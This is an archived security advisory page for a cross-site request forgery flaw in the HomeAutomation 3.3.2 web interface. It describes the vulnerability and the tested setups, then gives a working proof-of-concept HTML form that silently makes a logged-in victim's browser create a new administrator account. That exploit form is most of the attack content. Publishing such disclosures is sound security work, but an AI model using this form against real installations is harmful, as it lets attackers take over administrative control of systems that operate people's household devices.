what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HomeAutomation 3.3.2 Cross Site Request Forgery

HomeAutomation 3.3.2 Cross Site Request Forgery
Posted Dec 30, 2019
Authored by LiquidWorm | Site zeroscience.mk

HomeAutomation version 3.3.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | f23c1aa99af5634149ccf36f6901f15700735c2a52845ce2a65186b287a4ac7b

HomeAutomation 3.3.2 Cross Site Request Forgery

Change Mirror Download

HomeAutomation v3.3.2 CSRF Add Admin Exploit


Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and except for Tellstick it also comes with support for Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.

Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5558
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php


06.11.2019

--


<html>
<body>
<form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST">
<input type="hidden" name="id" value="-1" />
<input type="hidden" name="action" value="save" />
<input type="hidden" name="editable" value="2" />
<input type="hidden" name="username" value="testingus" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="firstname" value="Tester" />
<input type="hidden" name="lastname" value="Testovski" />
<input type="hidden" name="email" value="test@zeroscience.mk" />
<input type="hidden" name="userlevel" value="3" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Addmoi" />
</form>
</body>
</html>
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close